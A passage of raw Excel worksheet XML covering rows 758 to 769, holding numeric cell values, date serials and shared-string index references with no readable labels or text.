        <v>0</v>
      </c>
      <c r="AY758">
        <v>8</v>
      </c>
      <c r="AZ758">
        <v>23</v>
      </c>
      <c r="BA758" t="s">
        <v>16988</v>
      </c>
      <c r="BB758" t="s">
        <v>15498</v>
      </c>
      <c r="BC758">
        <v>0</v>
      </c>
      <c r="BD758" t="s">
        <v>10774</v>
      </c>
    </row>
    <row r="759" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A759">
        <v>2346</v>
      </c>
      <c r="B759" t="s">
        <v>5926</v>
      </c>
      <c r="C759" t="s">
        <v>74</v>
      </c>
      <c r="D759" t="s">
        <v>5927</v>
      </c>
      <c r="E759" t="s">
        <v>363</v>
      </c>
      <c r="F759" t="s">
        <v>5928</v>
      </c>
      <c r="G759" s="1">
        <v>43924</v>
      </c>
      <c r="H759">
        <v>3143</v>
      </c>
      <c r="I759">
        <v>3143</v>
      </c>
      <c r="J759">
        <v>0</v>
      </c>
      <c r="K759">
        <v>3</v>
      </c>
      <c r="L759">
        <v>0</v>
      </c>
      <c r="M759">
        <v>0</v>
      </c>
      <c r="N759">
        <v>0</v>
      </c>
      <c r="O759">
        <v>0</v>
      </c>
      <c r="P759">
        <v>0</v>
      </c>
      <c r="Q759">
        <v>5</v>
      </c>
      <c r="R759">
        <v>20</v>
      </c>
      <c r="S759">
        <v>0</v>
      </c>
      <c r="T759">
        <v>1</v>
      </c>
      <c r="U759">
        <v>0</v>
      </c>
      <c r="V759">
        <v>30000</v>
      </c>
      <c r="W759">
        <v>0</v>
      </c>
      <c r="X759">
        <v>0</v>
      </c>
      <c r="Y759">
        <v>0</v>
      </c>
      <c r="Z759">
        <v>0</v>
      </c>
      <c r="AA759">
        <v>0</v>
      </c>
      <c r="AB759">
        <v>250</v>
      </c>
      <c r="AC759">
        <v>1000</v>
      </c>
      <c r="AD759">
        <v>0</v>
      </c>
      <c r="AE759">
        <v>1000</v>
      </c>
      <c r="AF759" t="s">
        <v>1348</v>
      </c>
      <c r="AG759">
        <v>59252</v>
      </c>
      <c r="AH759">
        <v>14</v>
      </c>
      <c r="AJ759">
        <v>204</v>
      </c>
      <c r="AK759" t="s">
        <v>1556</v>
      </c>
      <c r="AL759" t="s">
        <v>1939</v>
      </c>
      <c r="AM759" t="s">
        <v>5929</v>
      </c>
      <c r="AN759" t="s">
        <v>55</v>
      </c>
      <c r="AO759">
        <v>1995</v>
      </c>
      <c r="AP759" t="s">
        <v>5930</v>
      </c>
      <c r="AQ759" t="s">
        <v>5931</v>
      </c>
      <c r="AR759" t="s">
        <v>5932</v>
      </c>
      <c r="AS759" t="s">
        <v>71</v>
      </c>
      <c r="AT759" t="s">
        <v>58</v>
      </c>
      <c r="AU759">
        <v>26</v>
      </c>
      <c r="AV759">
        <v>1</v>
      </c>
      <c r="AW759">
        <v>4</v>
      </c>
      <c r="AX759">
        <v>6</v>
      </c>
      <c r="AY759">
        <v>7</v>
      </c>
      <c r="AZ759">
        <v>0</v>
      </c>
      <c r="BA759" t="s">
        <v>16644</v>
      </c>
      <c r="BB759" t="s">
        <v>15844</v>
      </c>
      <c r="BC759">
        <v>0</v>
      </c>
      <c r="BD759" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="760" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A760">
        <v>2235</v>
      </c>
      <c r="B760" t="s">
        <v>5933</v>
      </c>
      <c r="C760" t="s">
        <v>168</v>
      </c>
      <c r="D760" t="s">
        <v>5934</v>
      </c>
      <c r="E760" t="s">
        <v>142</v>
      </c>
      <c r="F760" t="s">
        <v>673</v>
      </c>
      <c r="G760" s="1">
        <v>43956</v>
      </c>
      <c r="H760">
        <v>3151</v>
      </c>
      <c r="I760">
        <v>3151</v>
      </c>
      <c r="J760">
        <v>4</v>
      </c>
      <c r="K760">
        <v>1</v>
      </c>
      <c r="L760">
        <v>3</v>
      </c>
      <c r="M760">
        <v>0</v>
      </c>
      <c r="N760">
        <v>0</v>
      </c>
      <c r="O760">
        <v>0</v>
      </c>
      <c r="P760">
        <v>3</v>
      </c>
      <c r="Q760">
        <v>10</v>
      </c>
      <c r="R760">
        <v>4</v>
      </c>
      <c r="S760">
        <v>0</v>
      </c>
      <c r="T760">
        <v>1</v>
      </c>
      <c r="U760">
        <v>40000</v>
      </c>
      <c r="V760">
        <v>20000</v>
      </c>
      <c r="W760">
        <v>10000</v>
      </c>
      <c r="X760">
        <v>0</v>
      </c>
      <c r="Y760">
        <v>0</v>
      </c>
      <c r="Z760">
        <v>0</v>
      </c>
      <c r="AA760">
        <v>1000</v>
      </c>
      <c r="AB760">
        <v>10000</v>
      </c>
      <c r="AC760">
        <v>10000</v>
      </c>
      <c r="AD760">
        <v>0</v>
      </c>
      <c r="AE760">
        <v>20000</v>
      </c>
      <c r="AF760" t="s">
        <v>5935</v>
      </c>
      <c r="AG760">
        <v>45181</v>
      </c>
      <c r="AH760">
        <v>13</v>
      </c>
      <c r="AJ760">
        <v>169</v>
      </c>
      <c r="AK760" t="s">
        <v>5936</v>
      </c>
      <c r="AL760" t="s">
        <v>5937</v>
      </c>
      <c r="AM760" t="s">
        <v>5938</v>
      </c>
      <c r="AN760" t="s">
        <v>82</v>
      </c>
      <c r="AO760">
        <v>2017</v>
      </c>
      <c r="AP760">
        <v>2318512294</v>
      </c>
      <c r="AQ760" t="s">
        <v>5939</v>
      </c>
      <c r="AR760" t="s">
        <v>5940</v>
      </c>
      <c r="AS760" t="s">
        <v>371</v>
      </c>
      <c r="AT760" t="s">
        <v>72</v>
      </c>
      <c r="AU760">
        <v>26</v>
      </c>
      <c r="AV760">
        <v>1</v>
      </c>
      <c r="AW760">
        <v>114</v>
      </c>
      <c r="AX760">
        <v>153</v>
      </c>
      <c r="AY760">
        <v>27</v>
      </c>
      <c r="AZ760">
        <v>110</v>
      </c>
      <c r="BA760" t="s">
        <v>17094</v>
      </c>
      <c r="BB760" t="s">
        <v>15778</v>
      </c>
      <c r="BC760">
        <v>0</v>
      </c>
      <c r="BD760">
        <v>0</v>
      </c>
    </row>
    <row r="761" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A761">
        <v>2692</v>
      </c>
      <c r="B761" t="s">
        <v>5941</v>
      </c>
      <c r="C761" t="s">
        <v>477</v>
      </c>
      <c r="D761" t="s">
        <v>5942</v>
      </c>
      <c r="E761" t="s">
        <v>300</v>
      </c>
      <c r="F761" t="s">
        <v>899</v>
      </c>
      <c r="G761" s="1">
        <v>43959</v>
      </c>
      <c r="H761">
        <v>3170</v>
      </c>
      <c r="I761">
        <v>3170</v>
      </c>
      <c r="J761">
        <v>1</v>
      </c>
      <c r="K761">
        <v>1</v>
      </c>
      <c r="L761">
        <v>1</v>
      </c>
      <c r="M761">
        <v>0</v>
      </c>
      <c r="N761">
        <v>0</v>
      </c>
      <c r="O761">
        <v>0</v>
      </c>
      <c r="P761">
        <v>0</v>
      </c>
      <c r="Q761">
        <v>0</v>
      </c>
      <c r="R761">
        <v>1</v>
      </c>
      <c r="S761">
        <v>0</v>
      </c>
      <c r="T761">
        <v>1</v>
      </c>
      <c r="U761">
        <v>60000</v>
      </c>
      <c r="V761">
        <v>1500</v>
      </c>
      <c r="W761">
        <v>3000</v>
      </c>
      <c r="X761">
        <v>0</v>
      </c>
      <c r="Y761">
        <v>0</v>
      </c>
      <c r="Z761">
        <v>0</v>
      </c>
      <c r="AA761">
        <v>0</v>
      </c>
      <c r="AB761">
        <v>0</v>
      </c>
      <c r="AC761">
        <v>2000</v>
      </c>
      <c r="AD761">
        <v>0</v>
      </c>
      <c r="AE761">
        <v>1500</v>
      </c>
      <c r="AF761" t="s">
        <v>5943</v>
      </c>
      <c r="AG761">
        <v>95515</v>
      </c>
      <c r="AH761">
        <v>29</v>
      </c>
      <c r="AJ761">
        <v>383</v>
      </c>
      <c r="AK761" t="s">
        <v>2026</v>
      </c>
      <c r="AL761" t="s">
        <v>5944</v>
      </c>
      <c r="AM761" t="s">
        <v>5945</v>
      </c>
      <c r="AN761" t="s">
        <v>55</v>
      </c>
      <c r="AO761">
        <v>2020</v>
      </c>
      <c r="AP761">
        <v>8114300730</v>
      </c>
      <c r="AQ761" t="s">
        <v>5946</v>
      </c>
      <c r="AR761" t="s">
        <v>5947</v>
      </c>
      <c r="AS761" t="s">
        <v>71</v>
      </c>
      <c r="AT761" t="s">
        <v>58</v>
      </c>
      <c r="AU761">
        <v>26</v>
      </c>
      <c r="AV761">
        <v>0</v>
      </c>
      <c r="AW761">
        <v>4</v>
      </c>
      <c r="AX761">
        <v>8</v>
      </c>
      <c r="AY761">
        <v>0</v>
      </c>
      <c r="AZ761">
        <v>0</v>
      </c>
      <c r="BA761" t="s">
        <v>17271</v>
      </c>
      <c r="BB761" t="s">
        <v>15920</v>
      </c>
      <c r="BC761">
        <v>0</v>
      </c>
      <c r="BD761" t="s">
        <v>9544</v>
      </c>
    </row>
    <row r="762" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A762">
        <v>2695</v>
      </c>
      <c r="B762" t="s">
        <v>5948</v>
      </c>
      <c r="C762" t="s">
        <v>129</v>
      </c>
      <c r="D762" t="s">
        <v>5949</v>
      </c>
      <c r="E762" t="s">
        <v>363</v>
      </c>
      <c r="F762" t="s">
        <v>5950</v>
      </c>
      <c r="G762" s="1">
        <v>43949</v>
      </c>
      <c r="H762">
        <v>3186</v>
      </c>
      <c r="I762">
        <v>3186</v>
      </c>
      <c r="J762">
        <v>0</v>
      </c>
      <c r="K762">
        <v>0</v>
      </c>
      <c r="L762">
        <v>0</v>
      </c>
      <c r="M762">
        <v>0</v>
      </c>
      <c r="N762">
        <v>0</v>
      </c>
      <c r="O762">
        <v>0</v>
      </c>
      <c r="P762">
        <v>0</v>
      </c>
      <c r="Q762">
        <v>0</v>
      </c>
      <c r="R762">
        <v>0</v>
      </c>
      <c r="S762">
        <v>0</v>
      </c>
      <c r="T762">
        <v>1</v>
      </c>
      <c r="U762">
        <v>0</v>
      </c>
      <c r="V762">
        <v>0</v>
      </c>
      <c r="W762">
        <v>0</v>
      </c>
      <c r="X762">
        <v>0</v>
      </c>
      <c r="Y762">
        <v>0</v>
      </c>
      <c r="Z762">
        <v>0</v>
      </c>
      <c r="AA762">
        <v>0</v>
      </c>
      <c r="AB762">
        <v>0</v>
      </c>
      <c r="AC762">
        <v>0</v>
      </c>
      <c r="AD762">
        <v>0</v>
      </c>
      <c r="AE762">
        <v>24000</v>
      </c>
      <c r="AF762" t="s">
        <v>5951</v>
      </c>
      <c r="AG762">
        <v>15710</v>
      </c>
      <c r="AH762">
        <v>11</v>
      </c>
      <c r="AJ762">
        <v>268</v>
      </c>
      <c r="AK762" t="s">
        <v>829</v>
      </c>
      <c r="AL762" t="s">
        <v>5952</v>
      </c>
      <c r="AM762" t="s">
        <v>5953</v>
      </c>
      <c r="AN762" t="s">
        <v>55</v>
      </c>
      <c r="AO762">
        <v>2007</v>
      </c>
      <c r="AP762" t="s">
        <v>5954</v>
      </c>
      <c r="AQ762" t="s">
        <v>5955</v>
      </c>
      <c r="AR762" t="s">
        <v>5956</v>
      </c>
      <c r="AS762" t="s">
        <v>553</v>
      </c>
      <c r="AT762" t="s">
        <v>58</v>
      </c>
      <c r="AU762">
        <v>26</v>
      </c>
      <c r="AV762">
        <v>0</v>
      </c>
      <c r="AW762">
        <v>0</v>
      </c>
      <c r="AX762">
        <v>0</v>
      </c>
      <c r="AY762">
        <v>6</v>
      </c>
      <c r="AZ762">
        <v>1</v>
      </c>
      <c r="BA762" t="s">
        <v>17272</v>
      </c>
      <c r="BB762" t="s">
        <v>15916</v>
      </c>
      <c r="BC762">
        <v>0</v>
      </c>
      <c r="BD762" t="s">
        <v>10810</v>
      </c>
    </row>
    <row r="763" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A763">
        <v>2655</v>
      </c>
      <c r="B763" t="s">
        <v>4000</v>
      </c>
      <c r="C763" t="s">
        <v>88</v>
      </c>
      <c r="D763" t="s">
        <v>5957</v>
      </c>
      <c r="E763" t="s">
        <v>49</v>
      </c>
      <c r="F763" t="s">
        <v>5958</v>
      </c>
      <c r="G763" s="1">
        <v>43923</v>
      </c>
      <c r="H763">
        <v>3215</v>
      </c>
      <c r="I763">
        <v>3215</v>
      </c>
      <c r="J763">
        <v>0</v>
      </c>
      <c r="K763">
        <v>0</v>
      </c>
      <c r="L763">
        <v>0</v>
      </c>
      <c r="M763">
        <v>0</v>
      </c>
      <c r="N763">
        <v>0</v>
      </c>
      <c r="O763">
        <v>0</v>
      </c>
      <c r="P763">
        <v>0</v>
      </c>
      <c r="Q763">
        <v>0</v>
      </c>
      <c r="R763">
        <v>9</v>
      </c>
      <c r="S763">
        <v>0</v>
      </c>
      <c r="T763">
        <v>0</v>
      </c>
      <c r="U763">
        <v>0</v>
      </c>
      <c r="V763">
        <v>0</v>
      </c>
      <c r="W763">
        <v>0</v>
      </c>
      <c r="X763">
        <v>0</v>
      </c>
      <c r="Y763">
        <v>0</v>
      </c>
      <c r="Z763">
        <v>0</v>
      </c>
      <c r="AA763">
        <v>0</v>
      </c>
      <c r="AB763">
        <v>0</v>
      </c>
      <c r="AC763">
        <v>1350</v>
      </c>
      <c r="AD763">
        <v>0</v>
      </c>
      <c r="AE763">
        <v>0</v>
      </c>
      <c r="AF763" t="s">
        <v>5959</v>
      </c>
      <c r="AG763">
        <v>80361</v>
      </c>
      <c r="AH763">
        <v>17</v>
      </c>
      <c r="AJ763">
        <v>282</v>
      </c>
      <c r="AK763" t="s">
        <v>5960</v>
      </c>
      <c r="AL763" t="s">
        <v>5961</v>
      </c>
      <c r="AM763" t="s">
        <v>5962</v>
      </c>
      <c r="AN763" t="s">
        <v>55</v>
      </c>
      <c r="AO763">
        <v>2015</v>
      </c>
      <c r="AP763" t="s">
        <v>5963</v>
      </c>
      <c r="AQ763" t="s">
        <v>5964</v>
      </c>
      <c r="AR763" t="s">
        <v>5965</v>
      </c>
      <c r="AS763" t="s">
        <v>71</v>
      </c>
      <c r="AT763" t="s">
        <v>58</v>
      </c>
      <c r="AU763">
        <v>24</v>
      </c>
      <c r="AV763">
        <v>1</v>
      </c>
      <c r="AW763">
        <v>0</v>
      </c>
      <c r="AX763">
        <v>0</v>
      </c>
      <c r="AY763">
        <v>20</v>
      </c>
      <c r="AZ763">
        <v>3</v>
      </c>
      <c r="BA763" t="s">
        <v>16863</v>
      </c>
      <c r="BB763">
        <v>0</v>
      </c>
      <c r="BC763">
        <v>0</v>
      </c>
      <c r="BD763" t="s">
        <v>10285</v>
      </c>
    </row>
    <row r="764" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A764">
        <v>2102</v>
      </c>
      <c r="B764" t="s">
        <v>5966</v>
      </c>
      <c r="C764" t="s">
        <v>5506</v>
      </c>
      <c r="D764" t="s">
        <v>5967</v>
      </c>
      <c r="E764" t="s">
        <v>142</v>
      </c>
      <c r="F764" t="s">
        <v>5968</v>
      </c>
      <c r="G764" s="1">
        <v>43970</v>
      </c>
      <c r="H764">
        <v>3333</v>
      </c>
      <c r="I764">
        <v>3333</v>
      </c>
      <c r="J764">
        <v>0</v>
      </c>
      <c r="K764">
        <v>2</v>
      </c>
      <c r="L764">
        <v>3</v>
      </c>
      <c r="M764">
        <v>0</v>
      </c>
      <c r="N764">
        <v>0</v>
      </c>
      <c r="O764">
        <v>0</v>
      </c>
      <c r="P764">
        <v>0</v>
      </c>
      <c r="Q764">
        <v>2</v>
      </c>
      <c r="R764">
        <v>0</v>
      </c>
      <c r="S764">
        <v>0</v>
      </c>
      <c r="T764">
        <v>0</v>
      </c>
      <c r="U764">
        <v>0</v>
      </c>
      <c r="V764">
        <v>80</v>
      </c>
      <c r="W764">
        <v>7000</v>
      </c>
      <c r="X764">
        <v>0</v>
      </c>
      <c r="Y764">
        <v>0</v>
      </c>
      <c r="Z764">
        <v>0</v>
      </c>
      <c r="AA764">
        <v>0</v>
      </c>
      <c r="AB764">
        <v>500</v>
      </c>
      <c r="AC764">
        <v>0</v>
      </c>
      <c r="AD764">
        <v>0</v>
      </c>
      <c r="AE764">
        <v>0</v>
      </c>
      <c r="AF764" t="s">
        <v>5969</v>
      </c>
      <c r="AG764">
        <v>85233</v>
      </c>
      <c r="AH764">
        <v>19</v>
      </c>
      <c r="AJ764">
        <v>314</v>
      </c>
      <c r="AK764" t="s">
        <v>5970</v>
      </c>
      <c r="AL764" t="s">
        <v>5971</v>
      </c>
      <c r="AM764" t="s">
        <v>5972</v>
      </c>
      <c r="AN764" t="s">
        <v>55</v>
      </c>
      <c r="AO764">
        <v>2004</v>
      </c>
      <c r="AP764">
        <v>81338482626</v>
      </c>
      <c r="AQ764" t="s">
        <v>5973</v>
      </c>
      <c r="AR764" t="s">
        <v>5969</v>
      </c>
      <c r="AU764">
        <v>26</v>
      </c>
      <c r="AV764">
        <v>8</v>
      </c>
      <c r="AW764">
        <v>3</v>
      </c>
      <c r="AX764">
        <v>2</v>
      </c>
      <c r="AY764">
        <v>6</v>
      </c>
      <c r="AZ764">
        <v>1</v>
      </c>
      <c r="BA764" t="s">
        <v>17065</v>
      </c>
      <c r="BB764" t="s">
        <v>15700</v>
      </c>
      <c r="BC764" t="s">
        <v>9536</v>
      </c>
      <c r="BD764" t="s">
        <v>10469</v>
      </c>
    </row>
    <row r="765" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A765">
        <v>2332</v>
      </c>
      <c r="B765" t="s">
        <v>5974</v>
      </c>
      <c r="C765" t="s">
        <v>168</v>
      </c>
      <c r="D765" t="s">
        <v>5975</v>
      </c>
      <c r="E765" t="s">
        <v>142</v>
      </c>
      <c r="F765" t="s">
        <v>5976</v>
      </c>
      <c r="G765" s="1">
        <v>44000</v>
      </c>
      <c r="H765">
        <v>3347</v>
      </c>
      <c r="I765">
        <v>3347</v>
      </c>
      <c r="J765">
        <v>1</v>
      </c>
      <c r="K765">
        <v>0</v>
      </c>
      <c r="L765">
        <v>0</v>
      </c>
      <c r="M765">
        <v>0</v>
      </c>
      <c r="N765">
        <v>0</v>
      </c>
      <c r="O765">
        <v>1</v>
      </c>
      <c r="P765">
        <v>0</v>
      </c>
      <c r="Q765">
        <v>10</v>
      </c>
      <c r="R765">
        <v>0</v>
      </c>
      <c r="S765">
        <v>1</v>
      </c>
      <c r="T765">
        <v>1</v>
      </c>
      <c r="U765">
        <v>1000000</v>
      </c>
      <c r="V765">
        <v>0</v>
      </c>
      <c r="W765">
        <v>0</v>
      </c>
      <c r="X765">
        <v>0</v>
      </c>
      <c r="Y765">
        <v>0</v>
      </c>
      <c r="Z765">
        <v>1</v>
      </c>
      <c r="AA765">
        <v>0</v>
      </c>
      <c r="AB765">
        <v>100</v>
      </c>
      <c r="AC765">
        <v>0</v>
      </c>
      <c r="AD765">
        <v>1</v>
      </c>
      <c r="AE765">
        <v>1000</v>
      </c>
      <c r="AF765" t="s">
        <v>5977</v>
      </c>
      <c r="AG765">
        <v>17530</v>
      </c>
      <c r="AH765">
        <v>13</v>
      </c>
      <c r="AJ765">
        <v>176</v>
      </c>
      <c r="AK765" t="s">
        <v>5978</v>
      </c>
      <c r="AL765" t="s">
        <v>5979</v>
      </c>
      <c r="AM765" t="s">
        <v>5980</v>
      </c>
      <c r="AN765" t="s">
        <v>55</v>
      </c>
      <c r="AO765">
        <v>2018</v>
      </c>
      <c r="AP765" t="s">
        <v>5981</v>
      </c>
      <c r="AQ765" t="s">
        <v>5982</v>
      </c>
      <c r="AR765" t="s">
        <v>5983</v>
      </c>
      <c r="AS765" t="s">
        <v>187</v>
      </c>
      <c r="AT765" t="s">
        <v>58</v>
      </c>
      <c r="AU765">
        <v>26</v>
      </c>
      <c r="AV765">
        <v>1</v>
      </c>
      <c r="AW765">
        <v>5</v>
      </c>
      <c r="AX765">
        <v>5</v>
      </c>
      <c r="AY765">
        <v>5</v>
      </c>
      <c r="AZ765">
        <v>3</v>
      </c>
      <c r="BA765" t="s">
        <v>17135</v>
      </c>
      <c r="BB765" t="s">
        <v>15836</v>
      </c>
      <c r="BC765" t="s">
        <v>10853</v>
      </c>
      <c r="BD765" t="s">
        <v>10920</v>
      </c>
    </row>
    <row r="766" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A766">
        <v>2031</v>
      </c>
      <c r="B766" t="s">
        <v>5984</v>
      </c>
      <c r="C766" t="s">
        <v>99</v>
      </c>
      <c r="D766" t="s">
        <v>5985</v>
      </c>
      <c r="E766" t="s">
        <v>363</v>
      </c>
      <c r="F766" t="s">
        <v>5986</v>
      </c>
      <c r="G766" s="1">
        <v>44025</v>
      </c>
      <c r="H766">
        <v>3349</v>
      </c>
      <c r="I766">
        <v>3349</v>
      </c>
      <c r="J766">
        <v>0</v>
      </c>
      <c r="K766">
        <v>0</v>
      </c>
      <c r="L766">
        <v>0</v>
      </c>
      <c r="M766">
        <v>0</v>
      </c>
      <c r="N766">
        <v>0</v>
      </c>
      <c r="O766">
        <v>0</v>
      </c>
      <c r="P766">
        <v>0</v>
      </c>
      <c r="Q766">
        <v>0</v>
      </c>
      <c r="R766">
        <v>0</v>
      </c>
      <c r="S766">
        <v>0</v>
      </c>
      <c r="T766">
        <v>1</v>
      </c>
      <c r="U766">
        <v>0</v>
      </c>
      <c r="V766">
        <v>0</v>
      </c>
      <c r="W766">
        <v>0</v>
      </c>
      <c r="X766">
        <v>0</v>
      </c>
      <c r="Y766">
        <v>0</v>
      </c>
      <c r="Z766">
        <v>0</v>
      </c>
      <c r="AA766">
        <v>0</v>
      </c>
      <c r="AB766">
        <v>0</v>
      </c>
      <c r="AC766">
        <v>0</v>
      </c>
      <c r="AD766">
        <v>0</v>
      </c>
      <c r="AE766">
        <v>100000</v>
      </c>
      <c r="AF766" t="s">
        <v>5987</v>
      </c>
      <c r="AG766">
        <v>11240</v>
      </c>
      <c r="AH766">
        <v>12</v>
      </c>
      <c r="AJ766">
        <v>160</v>
      </c>
      <c r="AK766" t="s">
        <v>114</v>
      </c>
      <c r="AL766" t="s">
        <v>115</v>
      </c>
      <c r="AM766" t="s">
        <v>5988</v>
      </c>
      <c r="AN766" t="s">
        <v>55</v>
      </c>
      <c r="AO766">
        <v>2018</v>
      </c>
      <c r="AP766" t="s">
        <v>5989</v>
      </c>
      <c r="AQ766" t="s">
        <v>5990</v>
      </c>
      <c r="AR766" t="s">
        <v>5987</v>
      </c>
      <c r="AU766">
        <v>26</v>
      </c>
      <c r="AV766">
        <v>0</v>
      </c>
      <c r="AW766">
        <v>0</v>
      </c>
      <c r="AX766">
        <v>0</v>
      </c>
      <c r="AY766">
        <v>7</v>
      </c>
      <c r="AZ766">
        <v>0</v>
      </c>
      <c r="BA766" t="s">
        <v>17045</v>
      </c>
      <c r="BB766" t="s">
        <v>15654</v>
      </c>
      <c r="BC766" t="s">
        <v>9839</v>
      </c>
      <c r="BD766" t="s">
        <v>9840</v>
      </c>
    </row>
    <row r="767" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A767">
        <v>1852</v>
      </c>
      <c r="B767" t="s">
        <v>5991</v>
      </c>
      <c r="C767" t="s">
        <v>5506</v>
      </c>
      <c r="D767" t="s">
        <v>5992</v>
      </c>
      <c r="E767" t="s">
        <v>49</v>
      </c>
      <c r="F767" t="s">
        <v>364</v>
      </c>
      <c r="G767" s="1">
        <v>43959</v>
      </c>
      <c r="H767">
        <v>3390</v>
      </c>
      <c r="I767">
        <v>3390</v>
      </c>
      <c r="J767">
        <v>0</v>
      </c>
      <c r="K767">
        <v>0</v>
      </c>
      <c r="L767">
        <v>0</v>
      </c>
      <c r="M767">
        <v>0</v>
      </c>
      <c r="N767">
        <v>0</v>
      </c>
      <c r="O767">
        <v>0</v>
      </c>
      <c r="P767">
        <v>0</v>
      </c>
      <c r="Q767">
        <v>6</v>
      </c>
      <c r="R767">
        <v>0</v>
      </c>
      <c r="S767">
        <v>0</v>
      </c>
      <c r="T767">
        <v>2</v>
      </c>
      <c r="U767">
        <v>0</v>
      </c>
      <c r="V767">
        <v>0</v>
      </c>
      <c r="W767">
        <v>0</v>
      </c>
      <c r="X767">
        <v>0</v>
      </c>
      <c r="Y767">
        <v>0</v>
      </c>
      <c r="Z767">
        <v>0</v>
      </c>
      <c r="AA767">
        <v>0</v>
      </c>
      <c r="AB767">
        <v>900</v>
      </c>
      <c r="AC767">
        <v>0</v>
      </c>
      <c r="AD767">
        <v>0</v>
      </c>
      <c r="AE767">
        <v>450</v>
      </c>
      <c r="AF767" t="s">
        <v>5993</v>
      </c>
      <c r="AG767">
        <v>0</v>
      </c>
      <c r="AH767">
        <v>19</v>
      </c>
      <c r="AJ767">
        <v>294</v>
      </c>
      <c r="AK767" t="s">
        <v>5994</v>
      </c>
      <c r="AL767" t="s">
        <v>5995</v>
      </c>
      <c r="AM767" t="s">
        <v>5996</v>
      </c>
      <c r="AN767" t="s">
        <v>55</v>
      </c>
      <c r="AO767">
        <v>2011</v>
      </c>
      <c r="AP767">
        <v>8212274000</v>
      </c>
      <c r="AQ767" t="s">
        <v>5997</v>
      </c>
      <c r="AR767" t="s">
        <v>5998</v>
      </c>
      <c r="AS767" t="s">
        <v>71</v>
      </c>
      <c r="AT767" t="s">
        <v>58</v>
      </c>
      <c r="AU767">
        <v>26</v>
      </c>
      <c r="AV767">
        <v>2</v>
      </c>
      <c r="AW767">
        <v>34</v>
      </c>
      <c r="AX767">
        <v>50</v>
      </c>
      <c r="AY767">
        <v>13</v>
      </c>
      <c r="AZ767">
        <v>10</v>
      </c>
      <c r="BA767" t="s">
        <v>17332</v>
      </c>
      <c r="BB767" t="s">
        <v>15924</v>
      </c>
      <c r="BC767" t="s">
        <v>9536</v>
      </c>
      <c r="BD767" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="768" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A768">
        <v>2234</v>
      </c>
      <c r="B768" t="s">
        <v>5999</v>
      </c>
      <c r="C768" t="s">
        <v>4653</v>
      </c>
      <c r="D768" t="s">
        <v>6000</v>
      </c>
      <c r="E768" t="s">
        <v>363</v>
      </c>
      <c r="F768" t="s">
        <v>6001</v>
      </c>
      <c r="G768" s="1">
        <v>43934</v>
      </c>
      <c r="H768">
        <v>3392</v>
      </c>
      <c r="I768">
        <v>3392</v>
      </c>
      <c r="J768">
        <v>0</v>
      </c>
      <c r="K768">
        <v>0</v>
      </c>
      <c r="L768">
        <v>0</v>
      </c>
      <c r="M768">
        <v>0</v>
      </c>
      <c r="N768">
        <v>0</v>
      </c>
      <c r="O768">
        <v>0</v>
      </c>
      <c r="P768">
        <v>0</v>
      </c>
      <c r="Q768">
        <v>1</v>
      </c>
      <c r="R768">
        <v>0</v>
      </c>
      <c r="S768">
        <v>0</v>
      </c>
      <c r="T768">
        <v>1</v>
      </c>
      <c r="U768">
        <v>0</v>
      </c>
      <c r="V768">
        <v>0</v>
      </c>
      <c r="W768">
        <v>0</v>
      </c>
      <c r="X768">
        <v>0</v>
      </c>
      <c r="Y768">
        <v>0</v>
      </c>
      <c r="Z768">
        <v>0</v>
      </c>
      <c r="AA768">
        <v>0</v>
      </c>
      <c r="AB768">
        <v>500</v>
      </c>
      <c r="AC768">
        <v>0</v>
      </c>
      <c r="AD768">
        <v>0</v>
      </c>
      <c r="AE768">
        <v>1000</v>
      </c>
      <c r="AF768" t="s">
        <v>6002</v>
      </c>
      <c r="AG768">
        <v>36373</v>
      </c>
      <c r="AH768">
        <v>7</v>
      </c>
      <c r="AJ768">
        <v>92</v>
      </c>
      <c r="AK768" t="s">
        <v>6003</v>
      </c>
      <c r="AL768" t="s">
        <v>6004</v>
      </c>
      <c r="AM768" t="s">
        <v>6005</v>
      </c>
      <c r="AN768" t="s">
        <v>68</v>
      </c>
      <c r="AO768">
        <v>2007</v>
      </c>
      <c r="AP768">
        <v>85250502058</v>
      </c>
      <c r="AQ768">
        <v>85250502058</v>
      </c>
      <c r="AR768" t="s">
        <v>6006</v>
      </c>
      <c r="AS768" t="s">
        <v>71</v>
      </c>
      <c r="AT768" t="s">
        <v>72</v>
      </c>
      <c r="AU768">
        <v>0</v>
      </c>
      <c r="AV768">
        <v>0</v>
      </c>
      <c r="AW768">
        <v>0</v>
      </c>
      <c r="AX768">
        <v>4</v>
      </c>
      <c r="AY768">
        <v>2</v>
      </c>
      <c r="AZ768">
        <v>6</v>
      </c>
      <c r="BA768" t="s">
        <v>17093</v>
      </c>
      <c r="BB768" t="s">
        <v>17092</v>
      </c>
      <c r="BC768" t="s">
        <v>9791</v>
      </c>
      <c r="BD768">
        <v>0</v>
      </c>
    </row>
    <row r="769" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A769">
        <v>1912</v>
      </c>
      <c r="B769" t="s">
        <v>6007</v>
      </c>
      <c r="C769" t="s">
        <v>129</v>
      </c>
      <c r="D769" t="s">
        <v>6008</v>
      </c>
      <c r="E769" t="s">
        <v>49</v>
      </c>
      <c r="F769" t="s">
        <v>6009</v>
      </c>
      <c r="G769" s="1">
        <v>43923</v>
      </c>
      <c r="H769">
        <v>3407</v>
      </c>
      <c r="I769">
        <v>3407</v>
      </c>
      <c r="J769">
        <v>1</v>
      </c>
      <c r="K769">
        <v>0</v>
      </c>
      <c r="L769">
        <v>0</v>
      </c>
      <c r="M769">
        <v>0</v>
      </c>
      <c r="N769">
        <v>0</v>
      </c>
      <c r="O769">
        <v>0</v>
      </c>
      <c r="P769">
        <v>0</v>
      </c>
      <c r="Q769">
        <v>2</v>
      </c>
      <c r="R769">
        <v>24</v>
      </c>
      <c r="S769">
        <v>0</v>
      </c>
      <c r="T769">
        <v>0</v>
      </c>
      <c r="U769">
        <v>1000</v>
      </c>
      <c r="V769">
        <v>0</v>
      </c>
      <c r="W769">
        <v>0</v>
      </c>
      <c r="X769">
        <v>0</v>
      </c>
